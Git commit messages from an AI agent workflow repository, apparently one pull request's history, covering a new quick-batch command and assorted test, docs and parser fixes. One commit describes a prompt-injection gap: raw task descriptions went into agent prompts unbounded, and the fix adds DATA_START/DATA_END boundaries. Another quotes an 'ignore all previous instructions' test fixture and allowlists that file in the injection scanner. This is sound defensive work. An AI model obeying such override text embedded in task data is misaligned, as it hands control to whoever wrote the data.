quick-batch-command-router production-module buckets from the CORE pass. These reference files that do not exist yet. * feat(#3676): author the quick-batch command, workflow, and planner mode Phase 4 markdown-authoring pass (epic #3344, ADR-1239 "Quick-batch binding") — the orchestration layer that calls into Pass 1's CLI verbs (src/quick-batch-command-router.cts). - commands/gsd/quick-batch.md (new): frontmatter/objective/process, delegates argument validation to `quick-batch parse-args` (parseQuickBatchArgs) rather than re-deriving the grammar. - gsd-core/workflows/quick-batch.md (new, 11843 bytes — under ADR 1610's 32768-byte NEW_FILE_CAP for a brand-new file) + 9 lazy-loaded step fragments under gsd-core/workflows/quick-batch/steps/: resume-mode, batch-init, research-phase (flag:--research), planner-wave (+ nested plan-checker-loop when --validate), worktree-dispatch, merge-wave, verification-wave (flag:--validate), completion. Covers design doc rows 3-45: capacity/isolation resolution (reusing dispatch-isolation-gate.md verbatim), per-DAG- layer planning with full-task-catalog prompts and always-required depends_on/files_modified frontmatter, serialized worktree create/ merge/cleanup via the existing worktree.cleanup-wave primitive, deterministic wave-order merging, verification routing (human_needed/gaps_found), the executor single-writer invariant, submodule fail-loud guard, and #1941 fork-base auto-degrade. - agents/gsd-planner.md: additive new `load_mode_context` bullet for `**Mode:** quick-batch`, pointing at the new gsd-core/references/planner-quick-batch.md reference (documents the always-required depends_on/files_modified contract, reusing the existing frontmatter grammar — no new keys). Existing modes byte-identical, only a new bullet added. - src/init.cts (+init-command-router.cts, +command-aliases.cts): cmdInitQuickBatch / `init.quick-batch` — model profiles, commit_docs, roadmap/planning existence checks, and the section_manifest field gating research-phase/verification-wave (reuses the existing flag:--research/flag:--validate WHEN_VOCABULARY atoms — no new atom needed). Rows 16-21, 25, 29, 36, 38, 39, 44, 46-50 covered structurally by the prior test(#3676) commit; rows 3-15, 22-24, 26-28, 30-35, 37, 40-43, 45 covered by construction (verb wiring, single-writer prompt constraints, crash-window resume via unmodified Phase 3 primitives). * docs(#3676): regenerate skills/inventory/section-manifest/install-tree; baseline the intentional word-splitting pattern npm run regen:derived output for the new command/workflow/reference (epic #3344, ADR-1239 "Quick-batch binding"): - skills/gsd-quick-batch/SKILL.md (generated from commands/gsd/quick-batch.md) - docs/INVENTORY.md rows for /gsd-quick-batch, quick-batch.md, planner-quick-batch.md, and the quick-batch-dispatch.cjs/ quick-batch-command-router.cjs CLI-module rows' now-live `/gsd-quick-batch` cross-reference (was "(separate, follow-up)") + docs/INVENTORY-MANIFEST.json (`node scripts/gen-inventory-manifest.cjs --write`) - gsd-core/workflows/section-manifest.json (`npm run gen:section-manifest`) — research-phase/verification-wave gsd:section entries for the new quick-batch workflow - tests/fixtures/install-tree/*.json (`npm run gen:install-tree`) — the new command/workflow/skill/reference files now ship to every runtime scripts/lint-workflow-shellcheck-baseline.json: 3 new entries for gsd-core/workflows/quick-batch.md's intentional flag-token/$ARGUMENTS word-splitting (SC2046/SC2086) — the same deliberate unquoted-optional- flag pattern gsd-core/workflows/quick.md already carries baselined (e.g. `$DISCUSS_PARAM $RESEARCH_PARAM` in quick.md's own Step 2); quoting would break the intended "omit this arg when the flag is false" splitting. * fix(#3676): close prompt-injection and argv/glob-injection gaps in quick-batch leaf dispatch Security review pass findings, both confirmed real: 1. HIGH — prompt injection, no boundaries. Every leaf-dispatch fragment interpolated the raw, attacker-influenced task ${description} (and the shared ${TASK_CATALOG_TABLE}, broadcasting every item's raw description into every planner's prompt in the layer) straight into Agent() prompt bodies with no boundary. Fixed by wrapping every such interpolation in a <security_context> + DATA_START/DATA_END boundary, matching the CONCRETE convention already implemented in this repo (agents/gsd-debug-session-manager.md, agents/gsd-debugger.md, gsd-core/workflows/debug.md) — commands/gsd/quick.md's own <security_notes> only asserts this convention in prose, so the debug-agent files are the real precedent followed here. Added a new <security_notes> block to commands/gsd/quick-batch.md (it had none) documenting both this fix and the one below. 2. MEDIUM — unquoted $ARGUMENTS -> argv/glob injection. gsd-core/workflows/quick-batch.md and commands/gsd/quick-batch.md both ran `gsd_run quick-batch parse-args --raw -- $ARGUMENTS` UNQUOTED, causing shell word-splitting and pathname expansion on raw task-list text before the parser ever saw it. Fixed at the source: added a `--text <string>` form to the `parse-args` verb (src/quick-batch-command-router.cts) that accepts the ENTIRE $ARGUMENTS as ONE quoted argv element and does the whitespace split itself, in Node — which is never glob-aware, unlike the shell. Both call sites now use `--text "$ARGUMENTS"`. The `-- <tokens>` form is kept for direct/test callers that already have a real argv array. The SC2086 baseline entry added for the original unquoted line is now stale (`node scripts/lint-workflow-shellcheck.cjs` no longer reports it) and has been removed; the two SC2046 entries for the UNRELATED, still-unquoted `$([ "$VALIDATE_MODE" = true ] && echo --validate)`-style conditional-flag splitting remain — that line only ever expands to one of a few known-safe literal strings (never raw user text), matching quick.md's own already-baselined convention exactly. Tests: quick-batch-command-router.test.cjs covers the new --text form (token splitting, glob-shaped text passing through literally unexpanded, whitespace-only input). gsd-quick-batch-workflow.test.cjs asserts the DATA_START/DATA_END boundary on every leaf prompt (research-phase/planner-wave/plan-checker-loop/verification-wave, including the shared task catalog) and the quoted --text call sites. * fix(#3676): strengthen test-depth gaps in rows 9, 18, 24, 34, 35 Spec review pass findings — the test matrix claimed "yes" coverage these assertions did not actually support: - Row 9 (--jobs 0/-1/abc hostile case): previously asserted rejection only. Added an end-to-end assertion (tests/quick-batch-command-router.test.cjs, committed alongside the security fix that touches the same file) that .planning/quick-batches/ is never created for any rejected value — createBatch is genuinely never reached. - Row 18 (--resume <unknown-batch-id>): previously only exercised a hand-corrupted BATCH.json, never a genuinely nonexistent batch directory. Added the real nonexistent-id case (also in quick-batch-command-router.test.cjs). - Row 24 (post-planning updateBatchItems racing a concurrent completeQuickItem for a different item, both through withPlanningLock): zero test existed. Added a property test (tests/quick-batch.property.test.cjs, appended — Phase 3's own file, no existing test touched) exercising both call orders and asserting no lost update in the final on-disk manifest — the same technique Phase 3's own row-15 lock-contention property test uses (sequential calls through the real lock; a working mutex makes any interleaving equivalent to some serial order, so this is the same claim a literal concurrent-thread test would make without OS-level threading). - Row 34 (worktree preserved on merge_failed) and row 35 (undeclared- deletion detection): both were previously asserted only at the pure routeMergeOutcome level. Added tests/gsd-quick-batch-merge-integration.test.cjs using the SAME real-git-fixture pattern tests/worktree-safety.test.cjs already establishes for executeWorktreeWaveCleanupPlan (real repo, real worktree, a REAL merge conflict / a REAL file deletion diffed against declared_deletions) — asserting the actual worktree directory survives on disk, not just that a pure function returns a preserveWorktree:true field. Named gsd-quick-batch-* so lint-test- file-count's bucketing doesn't fold it into any capped module bucket. Row 48 (/gsd:quick regression) intentionally left as-is per the reviewer's own framing: the byte-identity claim is already mechanically proven by the changed-path diff (git diff --name-only empty on those two paths IS byte-identity), and a genuine execution- level regression test would require actually running the workflow — out of scope for this repo's unit-test model (no other quick.md regression test in this repo does that either). * docs(#3676): add the changeset and user-facing docs the command needed Standards review pass findings — both HARD: - Missing changeset. None of the 6 prior #3676 commits touched .changeset/*. /gsd-quick-batch is a new user-facing command; CLAUDE.md/CONTRIBUTING.md require one. Added .changeset/silly-rams-caper.md (type: Added, pr: 0 placeholder — backfilled after the PR opens, matching CLAUDE.md's own documented convention and Phase 3's own precedent, #4190's .changeset/mellow-yaks-squeak.md). Uses the docs-convention hyphen form `/gsd-quick-batch` throughout, never the source-artifact colon form (`scripts/lint-docs-command-form.cjs` confirms 0 violations; that check scans docs/**, not .changeset/, so it was never actually in scope for the fragment itself, but the wording still follows the doc convention for consistency, matching how Phase 3's own fragment named the not-yet-shipped command). - Missing docs. Added docs/how-to/batch-quick-tasks.md (Diátaxis how-to, matching docs/how-to/handle-quick-and-fast-tasks.md's existing convention for /gsd-quick /gsd-fast) covering --jobs, --validate, --research, --resume, --file, the capacity/isolation interaction, and resume/failure recovery. Cross-linked from docs/README.md's how-to index and from handle-quick-and-fast-tasks.md's own "Related" section. Added a /gsd-quick-batch section to docs/COMMANDS.md (same table format as the existing /gsd-quick entry) and docs/features/quick-batch.md (REQ-QB-01..12, same frontmatter shape as docs/features/quick-mode.md) — regenerated docs/FEATURES.md (179 features) and skills/gsd-quick-batch/SKILL.md via the standard generators. * fix(#3676): close docs-parity, attribution, and generated-registry gaps gsd-test caught gsd-test's real run against 155e8975b3 found 43 failures, all rooted in this phase's own new command/workflow never being registered across ~10 independent generated/hand-maintained registries this repo keeps in parity by convention. Root-caused each, no test weakened or special-cased. - help.md ↔ commands/gsd/ bidirectional parity (docs-parity-live- registry.test.cjs): added a /gsd:quick-batch entry to gsd-core/workflows/help/modes/full.md (the real help.md content; gsd-core/workflows/help.md is a thin dispatcher) documenting every flag (--file/--jobs/--validate/--research/--resume), matching the existing /gsd:quick entry's format. - gen-section-manifest.test.cjs: quick-batch.md's `gsd_run query init.quick-batch` invocation used inline `$([ ... ] && echo --flag)` substitutions, which never satisfy the test's exact-whitespace-token / assigned-variable detection (the trailing `))` glued onto `--research` in the compound substitution broke the "exact token" match). Rewrote to the same VALIDATE_PARAM/RESEARCH_PARAM two-line pattern gsd-core/workflows/quick.md's own Step 2 already uses. - runtime-launcher-parity.test.cjs: the 8 quick-batch/steps/*.md fragments that call gsd_run each needed their OWN embedded copy of the canonical shim preamble (every workflow .md that calls gsd_run carries its own copy — reading one file does not persist shell state into another). Ran `node scripts/sync-runtime-launcher.cjs`, which inserted it before each file's first gsd_run call. plan-checker-loop.md correctly has none — it never calls gsd_run directly. - Namespace routing (skill-manifest.test.cjs, install-nested- layout.test.cjs, runtime-artifact-layout-surface.test.cjs): added `quick-batch` to commands/gsd/ns-workflow.md's `requires:` array and routing table (same namespace `quick` already routes through), and to src/clusters.cts's `utility` cluster (same cluster `quick` already belongs to). Verified by hand-running installRuntimeArtifacts + applySurface for augment/cline against a real temp install: exactly 6 top-level gsd-ns-* router dirs, gsd-quick-batch correctly nested under gsd-ns-workflow/skills/, never re-flattened. - mcp-server-catalog.test.cjs: hardcoded command count 71 -> 72 (a brand-new command is a real count change, not a bug this test should hide). - model-omit-when-inherit-guard.test.cjs: added the canonical `<!-- #2517 model-omit-on-inherit -->` marker block to gsd-core/workflows/quick-batch.md (every leaf dispatch — planner/ researcher/checker/executor/verifier — lives in a steps/ fragment, read combined with the host by this test's own readWorkflowCombined, same as quick.md's own research-phase.md carries it for its gated section). Also fixed a genuine pre-existing inconsistency in the test's own "#2711: the guarded set is derived from dispatch sites" check: its `nonDispatching` computation read the BARE host file while `derived` (the set it's checked against) reads the combined host+steps content — inconsistent with that same test file's own #2994 doc comment explaining why the combined read is necessary. quick-batch.md is the first workflow whose EVERY model="{...}" dispatch site lives in a mandatory (never gated) steps/ fragment — extracted to stay under ADR-1610's tighter NEW_FILE_CAP for a brand-new file — which is what exposed the mismatch. Fixed by using the same readWorkflowCombined read in both places. - skill-frontmatter-contract.test.cjs: shortened commands/gsd/quick-batch.md's frontmatter `description` from 107 to 91 chars (<=100 budget), and added `quick-batch.md` to the hand- maintained KNOWN_SKILLS consolidation allowlist with a #3676 justification comment (a genuinely new first-party command, not a consolidation of an existing skill). - workflow-fragments-emission.install.test.cjs: added `quick-batch.md` to the hand-maintained MARKED_WORKFLOWS set (composeWorkflow is deliberately NOT a no-op for it — its research-phase/verification- wave sections are gated). - Regenerated all downstream artifacts (npm run build:lib && npm run regen:derived && npm run gen:plugin-skills -- --write && npm run gen:features -- --write): skills/gsd-quick-batch/SKILL.md, skills/gsd-ns-workflow/SKILL.md, install-tree fixtures for augment/cline/hermes/qwen/trae/zcode. - emitted-attribution.test.cjs: agents/gsd-planner.md's #3676 addition (one new `load_mode_context` bullet pointing at the new gsd-core/references/planner-quick-batch.md reference) grew the file 124 bytes without an acknowledgment trailer. Acknowledged below — the growth is the deliberate, additive, single-bullet change from the earlier feat(#3676) commit, not drift. Verified: npm run build:lib clean, npx tsc -p tsconfig.build.json --noEmit clean, GITHUB_BASE_REF=next npm run lint:ci fully green (includes lint-workflow-shellcheck, lint-test-file-count, lint-docs-command-form). The deep install/spawn/registry tests gsd-test actually runs (docs-parity-live-registry, gen-section-manifest, runtime-launcher-parity, install-nested-layout, runtime-artifact-layout-surface, skill-manifest, skill-frontmatter- contract, mcp-server-catalog, model-omit-when-inherit-guard, workflow-fragments-emission) are not part of lint:ci — each fix above was independently verified by hand-invoking the exact production function the failing test calls (installRuntimeArtifacts, applySurface, composeWorkflow, the CLUSTERS union, the section-manifest forwarding regex) against the real repo tree and confirming the expected shape. Emitted-Drift-Ack-Growth: gsd-planner.md — additive #3676 quick-batch mode bullet in load_mode_context (one new line pointing at gsd-core/references/planner-quick-batch.md); not drift. * fix(#3676): trim the /gsd:quick-batch help.md entry to fit the LARGE tier line budget skill-frontmatter-contract.test.cjs's "feature #3039: tiered help — size budgets" enforces a SEPARATE line-count ceiling for gsd-core/workflows/help/modes/full.md (FULL_BUDGET = 844 lines, tighten-only ratchet, scripts/lib/allowlist-ratchet.cjs's assertTightCeiling) — independent of the skill-frontmatter description- length budget and consolidation allowlist I touched in the prior round; those are unrelated checks in the same test FILE, not the same check. Root cause: the /gsd:quick-batch entry I added to full.md in the docs-parity fix round was 17 lines, pushing the file from 834 to 851 lines — 7 over the 844 ceiling. Condensed the entry (merged the per-flag bullet list into one dense "Flags:" line, dropped from 3 Usage examples to 1) to 844 lines exactly — at the ceiling with zero slack, which assertTightCeiling accepts (it only fails on actualMax > ceiling, or on slack > grace when the ceiling is too LOOSE — zero slack triggers neither). Verified after trimming: full.md still contains a live /gsd:quick-batch reference (bidirectional parity) and all 5 argument-hint flags (--jobs/--validate/--research/--resume/--file) still appear as literal tokens (docs-parity-live-registry.test.cjs's own flag-coverage check, re-run by hand against the trimmed content). Verified: npm run build:lib clean, npx tsc -p tsconfig.build.json --noEmit clean, GITHUB_BASE_REF=next npm run lint:ci fully green. * docs(#3676): backfill changeset pr number to 4212 Follow-up to fix(#3676) commits — .changeset/silly-rams-caper.md's pr:0 placeholder backfilled with the real PR number now that gh api POST /pulls has returned it (#4212). Matches CLAUDE.md's PR Number Handling convention and Phase 3's own #4190 precedent (708c5a3f8c). Doc-only (root-level .changeset/*.md fragment), exempt from a fresh gsd-test run per pre-pr-gate.sh's DOC_ONLY_RE. * fix(#3676): resolve prompt-injection-scan false positive on test fixture tests/quick-batch.test.cjs:232's row 11b regression proves the task-list parser carries a prompt-injection-shaped task description through createBatch as inert data, never interpreted. The fixture has to be a real "ignore all previous instructions..." phrase or the test asserts nothing, but the full-file --diff scan flagged it once unrelated edits in the same file pulled it into the changed-file set. Add the file to prompt-injection-scan.sh's ALLOWLIST, matching the sanctioned, precedented exemption already used for other legitimate security-regression fixtures (tests/windsurf-conversion.test.cjs, tests/health-validation.test.cjs, tests/continuation-grammar-parity.test.cjs) per DEFECT.PROMPT-INJECTION-SCAN-COLLISION. --------- Co-authored-by: sim <sim@local> |
||
|
|
7c52344284 |
fix(#4003): anchor the safe-resume gate's plan-scope greps to the milestone (#4194)
* test(#4003): safe_resume_gate must grep an anchored padding-tolerant scope * fix(#4003): anchor the resume-gate scope greps and bound them to the milestone tag Emitted-Drift-Ack-Growth: execute-phase.md — #4003 rewrites three commit-scope greps (safe_resume_gate, TDD RED, completion spot-check) to anchored zero-pad-tolerant regexes with a milestone tag bound; growth is the fix itself * test(#4003): align shape assertions with the implemented gate text * fix: bump fast-uri past GHSA-jqff-g426-hqxp (transitive, advisory reddened next) * fix(#4003): bound the TDD RED grep to the milestone and fix tdd.md's example greps * test(#4003): the gate pin tracks the anchored scope grep * fix(#4003): trim the gate rationale to hold the 93400 margin ceiling * test(#4003): the RED-grep pin tracks the milestone-bounded invocation * chore(#4003): changeset for the anchored resume-gate scope * chore(#4003): backfill changeset pr number --------- Co-authored-by: sim <sim@local> |
||
|
|
647365faf1 |
fix(#4011): key the TDD runtime gate on TDD_MODE alone (#4180)
* test(#4011): TDD gate keys on TDD_MODE alone, not the MVP intersection Contract updates: no shipped line may conjoin MVP_MODE with TDD_MODE as a gate condition, the end-of-phase escalation must not require MVP, the executor agent's gate section triggers on TDD_MODE alone, and the gate semantics reference loads without MVP_MODE. * fix(#4011): key the TDD runtime gate on TDD_MODE alone The RED-commit gate shipped as #76's MVP slice kept the paired invocation's conjunct, so workflow.tdd_mode=true was silently inert on every non-MVP phase, contradicting references/tdd.md's own contract. Drops the MVP conjunct from the per-task gate and the end-of-phase review escalation; rescopes execute-mvp-tdd.md's load condition, gsd-executor's gate section, and mvp-concepts' intersection claim. MVP remains free to imply TDD; the file is not renamed (stated assumption in the PR body). * test(#4011): scope no-conjunct detector to shell conditions; clean stale MVP+TDD phrasing Review follow-ups: the detector now only inspects if/[ condition lines so explanatory prose mentioning both flags cannot trip it; remaining 'under/outside MVP+TDD' phrases in execute-phase.md, the gate reference, and docs/INVENTORY.md now describe TDD-mode semantics. Emitted-Drift-Ack-Growth: execute-phase.md — TDD-gate decoupling comment + escalation rescoping (#4011) Emitted-Drift-Ack-Growth: gsd-executor.md — gate section trigger rescoped to TDD_MODE alone (#4011) * chore(#4011): backfill changeset pr number --------- Co-authored-by: sim <sim@local> |
||
|
|
bf4485ada2 |
enhance(#3717): make the edge probe's shape cues language-aware via an optional text_en field (#4156)
* test(#3717): add failing-first coverage for text_en language-aware classification Adds unit tests for the not-yet-implemented text_en field on Requirement (fallback selection, empty/whitespace/non-string rejection, shapes-override precedence), a SHAPE_CUES/VALID_SHAPES parity guard (RULESET.GENERATIVE-FIX), and workflow-prose contract tests asserting spec-phase.md Step 5.5 documents populating text_en for response_language projects. All new tests are RED until src/edge-probe.cts and the workflow docs are updated. * feat(#3717): make edge-probe shape classification read an optional text_en field Requirement gains an optional text_en; classifyShape's own signature stays untouched (a locked, directly-tested export), and the text_en ?? text selection is pushed to proposeEdges' single call site instead. text_en is validated fail-closed: an empty or whitespace-only value throws rather than silently winning the ?? fallback and degrading classification to zero shapes. This makes the #2773 doc-only translation convention an explicit, validatable field instead of an invisible instruction, per the approved Form-1 scope on #3717. * docs(#3717): document the text_en field across spec-phase, reference and how-to docs Updates Step 5.5's response_language instructions, the edge-probe reference Inputs contract, the FEATURES.md fragment, and the non-English how-to guide to describe the new text_en field: text keeps the requirement's own wording in all cases, text_en (when populated) is the engine-only English rendering the classifier prefers. * docs(#3717): record the text_en locked-surface change in CONTEXT.md and ADR-550 Updates the Edge Probe Module glossary entry to describe the text_en field and its fail-closed validation, and appends an ADR-550 amendment recording why this is additive and does not re-open the #652 LLM-classifier rejection (text_en is a plain field read by the existing deterministic regex classifier, not a new model-dependent surface). * docs(#3717): add changeset fragment and regenerate FEATURES.md pr:0 placeholder — backfilled with the real PR number after the PR opens. * docs(#3717): attribute the text_en machine check to engine-level validation, not prose tests Code-review (Spec axis) finding: the workflow-prose contract tests and the ADR-550 amendment overclaimed themselves as "the machine check the #2773 doc-only stopgap lacked." That check is actually engine-level (validateRequirement/classifyShape, covered in tests/edge-probe.test.cjs) — the prose tests are the same style of assertion #2773 already used. Reworded both to attribute the claim correctly. * fix(#3717): rewrap spec-phase.md so the id-unchanged sentence stays on one line The #3717 rewrite of Step 5.5's response_language paragraph moved a line break so "requirement `id`s" ended one physical line and "are never translated" started the next. The pre-existing #2773 regression test (tests/edge-probe-spec-phase-contract.test.cjs) asserts id + "never translated" on the SAME line (no \n in between, matching git's own line-oriented prose), so the reflow silently broke it. Rewrapped so the sentence lands on one line again, verified against every #2773/#3717 regex assertion in that test file. Emitted-Drift-Ack-Growth: spec-phase.md — #3717 adds text_en documentation to Step 5.5 (response_language paragraph + REQS_JSON heredoc comment); this growth is this PR's own diff, not incidental drift. * chore(#3717): backfill changeset PR number pr:0 -> pr:4156 now that the PR exists. --------- Co-authored-by: sim <sim@local> |
||
|
|
8c9265d4e5 |
fix(#3724): warning-only Dimension 3b findings no longer force the revision loop (#3758)
* fix(#3724): stop advisory Dimension 3b findings from forcing the revision loop Dimension 3b (undeclared/temporal coupling, #1954) is spec'd "never a blocker" but tagged severity: warning — the tier plan-phase's revision loop counts as must-fix — and the planner is never taught the rule, so every multi-wave phase touching shared mutable state replans at least once, and intentionally coupled plans re-flag identically every iteration to the stall prompt. Three coordinated changes: - gsd-plan-checker: retag 3b to severity: info, the tier references/revision-loop.md already exempts by design; recognize a coupling_justified frontmatter declaration in the Do-NOT-flag list so deliberate pairs converge. Additions are offset by trimming 3b motivation prose — the checker sits 45 bytes under its LARGE hard cap. - plan-phase step 12: INFO-only accept — an issues block with zero BLOCKER/WARNING entries accepts the plan and surfaces the advisories instead of re-entering the revision loop. Real blockers and warnings still gate unconditionally. - gsd-planner: slim pointer in assign_waves to the new progressive-disclosure reference gsd-core/references/planner-coupling.md (the planner sits 19 chars under its own cap), which carries the shared-mutable-state rule and the coupling_justified escape hatch so first-pass plans avoid the finding when the coupling is unintentional. Documented the coupling_justified field in docs/reference/plan-md.md. Growth acks per #2914; inventory manifest and install-tree fixtures regenerated for the new reference file. Closes #3724 Claude-Session: https://claude.ai/code/session_01GshUzpGjoxiw6uNRiFMHvM * test(#3724): pin Dimension 3b at severity: info The severity retag makes the old assertion (severity: warning) stale; lock the advisory tier from both directions — info must be present, warning must not — so a future edit cannot silently re-arm the revision-loop trigger. Refs #3724 Claude-Session: https://claude.ai/code/session_01GshUzpGjoxiw6uNRiFMHvM * chore(#3724): changeset fragment for PR #3758 Refs #3724 Claude-Session: https://claude.ai/code/session_01GshUzpGjoxiw6uNRiFMHvM * docs(#3724): roster planner-coupling.md in docs/INVENTORY.md The new reference was enumerated in the manifest and all 19 install-tree fixtures but missing its row in the Modular Planner Decomposition table — the roster half the manifest-sync test cannot check. (Review Blocker.) Refs #3724 Claude-Session: https://claude.ai/code/session_01GshUzpGjoxiw6uNRiFMHvM * test(#3724): cover all four acceptance criteria (review round 1) - plan-checker-coupling: the 3b severity assertion is now a PARITY check deriving the exempt tier from revision-loop.md's flow instead of hardcoding info — editing either side alone reds the suite. New describe pins the other three criteria: plan-phase's INFO-only accept clause (proven failing-first), the BLOCKER + WARNING count staying intact, the coupling_justified Do-NOT-flag exemption + fix_hint, and the planner pointer + planner-coupling.md content. - ack fragment: $comment's plan-phase figure corrected to +79B; the 2775 pin note carried forward into the gsd-planner.md entry, updated for upstream's #3761/#3764 Rule-paragraph anchor (which this diff leaves verbatim). The parallel-dependent-plans re-anchor this commit originally carried was superseded by upstream #3764 during review; this branch no longer touches that file. Refs #3724 Claude-Session: https://claude.ai/code/session_01GshUzpGjoxiw6uNRiFMHvM * fix(#3724): review round 2 — align the stance enumeration, complete the template contract MAJOR: <adversarial_stance>'s severity enumeration gains the INFO bullet so it agrees with Dimension 3b's 'ALWAYS INFO' mandate instead of contradicting it. Funded by extracting the inline <examples> block to the new progressive- disclosure reference gsd-core/references/plan-checker-examples.md (@-inlined from the same spot; #1949 precedent), which also restores the 3b motivation clause round 1 traded away (Nit 4) and nets the agent file SMALLER than base (49107 -> 48486) — the extraction the byte pressure was owed. MINOR: gsd-core/templates/phase-prompt.md now carries coupling_justified, and the field's shape becomes one 'plan-id: reason' string per coupled peer so a plan justified against two peers can express it; docs/reference/plan-md.md's Type column names the shape. NIT: the 3409 ack's plan-phase entry no longer calls the #1168 workflow ratchet an 'XL tier'. Acks and derived artifacts updated accordingly (checker entry removed — a shrink needs no ack; INVENTORY roster row + regen:derived for the new file). Claude-Session: https://claude.ai/code/session_01GshUzpGjoxiw6uNRiFMHvM * test(#3724): derive the 3b negative severity assertion (review round 2) Every severity token in the 3b span must BE the tier revision-loop.md exempts, replacing the hardcoded severity:warning negative — if the loop's exemption ever moves, the failure names the real conflict instead of blaming the agent file with a mutually-unsatisfiable pair. Claude-Session: https://claude.ai/code/session_01GshUzpGjoxiw6uNRiFMHvM * fix(#3724): refit the planner coupling pointer under the char cap Upstream #3299 (PR #3390) grew agents/gsd-planner.md to 49146 chars at the base, leaving 5 chars of headroom where the +16-char pointer was measured against 13 more. The pointer prose shortens to 'Non-file coupling:' — 49150 chars, back under the strict 49152-char cap — and the ack figures follow. The @-path the tests pin is unchanged. Claude-Session: https://claude.ai/code/session_01GshUzpGjoxiw6uNRiFMHvM * fix(#3724): re-home the plan-phase ack after the #3823 spent-fragment sweep Upstream #3078/#3823 deleted all fully-spent ack fragments, including 3409-unreachable-guard-arms.json, which carried this PR's plan-phase.md +79B append. Per the collision remedy that sweep added: take the deletion and home the still-live entry in this PR's own fragment. Figures re-measured at this merge base (90871 -> 90950 LF bytes). Claude-Session: https://claude.ai/code/session_01GshUzpGjoxiw6uNRiFMHvM * fix(#3724): absorb the spent #3172 plan-phase fragment into this PR's ack Upstream #3825 shipped 3172-stated-failing-direction.json naming only plan-phase.md, now spent at the base — colliding with this PR's live plan-phase entry. Per the #3003 pattern the fully-spent single-path fragment is deleted and this fragment stays the path's one source; figures re-measured at this base (93073 -> 93152 LF bytes). Claude-Session: https://claude.ai/code/session_01GshUzpGjoxiw6uNRiFMHvM * fix(#3724): review round 3 — true up the ack figures, restore the wave comment The fragment's absolute sizes are re-measured and anchored to base |
||
|
|
ef9ce3e598 |
fix(#3702): count asterisk, plus and ordered markers as deferred-items entries (#3739)
* fix(#3702): deferred-items counts `*`, `+` and ordered markers as list items
`deferred-items.md` has no template and no mandated shape, but its parser
recognised only the `- ` hyphen marker. Asterisk bullets, plus bullets and
dot-terminated ordered lists — all lists in CommonMark and GFM — contributed
ZERO entries on both the headless and the heading-delimited path, and a mixed
file dropped its non-hyphen entries while keeping their hyphenated siblings,
under-reporting without ever looking empty.
The restriction was a regex literal inherited from the Gaps seam, where the
template genuinely mandates the hyphen YAML-lite form; nothing in the module's
stated rationale distinguishes `*` from `-`.
Widened on the deferred path only:
- `splitGapsEntriesCore`'s entry opener, `extractGapEntryFields`' line-0 strip
and `rawGapEntryText`'s line-0 strip take a `BulletMarkers` parameter that
DEFAULTS to the hyphen-only set, so `## Gaps` keeps its template-mandated
grammar byte-for-byte and the module still has exactly one grouping pass.
- `splitDeferredHeadingEntries`' body-bullet test, `stripLeadingBulletMarker`
and `acknowledgeDeferredItem`'s status-field regexes move in lockstep —
widening what OPENS an entry without widening what is STRIPPED before field
extraction would surface an entry that can never resolve.
Unchanged, and pinned by tests: prose-only and bare headings still contribute
nothing ("prose is not an item"); a table under a leaf heading still yields
exactly its rows, since table lines are skipped before the body-marker flag can
be set and a `|` row is not a list marker; the paren-terminated ordered form
`1)` is out of this fix's scope.
* docs(#3702): changeset fragment (pr: 0 placeholder pre-create)
* fix(#3702): widen the forensic-audit prose entry rule to match the parser
Sibling site of the same defect class, found by a defect-class sweep of the
deferred-items consumers. `/gsd-progress` check 7 does NOT go through
`gsd-tools query` — it globs `deferred-items.md` and has the model read entries
by a prose rule that mandated "one entry per top-level `- ` line". Left as-is,
the marker widening would hold on the CLI path while the one consumer that
bypasses the parser kept reporting "No unresolved deferred items" for a file
written with `*`, `+` or an ordered marker: the same false negative, surviving
in the only place the fix could not reach by code.
Also pass DEFERRED_BULLET_MARKERS explicitly where the heading path extracts
fields. It was already correct — stripLeadingBulletMarker pre-strips the widened
set from every line, so the default hyphen strip is a no-op there — but relying
on that leaves a detection site and a strip site nominally on different marker
sets, which is exactly the asymmetry the BulletMarkers doc comment warns about.
Explicit is local; inferred is a trap for whoever edits the strip next.
Out of scope, noted rather than fixed: forensic-audit.md globs only
`.planning/phases/*/` and so misses archived milestone phases that
`scanDeferredItems` covers. Pre-existing, a different defect, and not this
issue's ruling.
* docs(#3702): note the milestone-close halt for heading-shape non-hyphen files in the changeset
A heading-delimited deferred-items.md written with */+/ordered markers
previously parsed to zero and closed silently; it now yields entries whose
heading shape acknowledgeDeferredItem refuses, halting complete-milestone
until hand-edited. User-visible, so the fragment states it.
* chore(#3702): set changeset fragment pr to 3739
* fix(#3702): CR-normalise the heading path and the acknowledge writer (review B1, M4, m2)
B1 — `splitDeferredHeadingEntries` stored RAW lines; on a CRLF file every
body line but the last still carried its `\r`, the `$`-anchored marker
strip failed on it, the marker survived into field extraction and the
field was lost — a `**Status:** resolved` that was not the file's final
line resurfaced its entry as open. The heading path now stores CR-stripped
lines like the headless path already did, and the strip regex tolerates a
trailing CR on its own. Round 1's CRLF test put `**Status:**` on the last
line, the one position `collectSection`'s `.trimEnd()` had already
de-CR'd; the new tests put it first and mid-body.
M4 (pre-existing on `next`) — `acknowledgeDeferredItem` found the status
line on a CR-stripped copy but rewrote the raw line with a `$`-anchored
`.*`, which cannot consume `\r`; `replace` returned its input, and the
writer reported `ok` over byte-identical content. The rewrite now runs on
a CR-stripped line. The comment that claimed `.*$` consumed the `\r` is
corrected — it was the bug, stated as the design.
m2 — the indent probe for an inserted `status:` line ran on the raw line
and fell back to indent 0 on CRLF; it is CR-stripped too.
* fix(#3702): derive every deferred-items marker regex from one source (review M3, N1, N2)
M3 — round 1 carried the marker alternation in FOUR places: the
`BulletMarkers` pair and two inline literals inside
`acknowledgeDeferredItem`, under a doc comment saying the interface
existed so a detection site and its strip site could not drift. All four
now derive from `DEFERRED_MARKER_ALT`; drift is impossible rather than
discouraged. A parity test pins the vocabulary against
`markdown-sectionizer`'s `iterateBullets` on everything the two grammars
are meant to agree on, and names the two points they deliberately differ.
N1 — the ordered marker is `\d{1,9}\.` (CommonMark §5.2), not `\d+\.`.
N2 — the marker is followed by `[ \t]`, not `\s`, which also accepted
`\r`; the tab remains accepted (CommonMark-legal) and the divergence from
`iterateBullets`' literal space is pinned rather than papered over.
The four regexes are exported for the parity test only.
* fix(#3702): an ordered marker opens an entry only from `1.` or inside a run (review B2, m1)
B2 — `\d+\.` alone read ordinary prose as a list: "2026. was a bad year
for this module" and, under `### Notes`, "3. is the number of retries we
settled on." both opened an entry on round 1, the second straight through
the "prose is not an item" contract that round's AC4 claimed to preserve.
CommonMark §5.3 faces the same ambiguity when an ordered list would
interrupt a paragraph and resolves it by requiring the list to start with
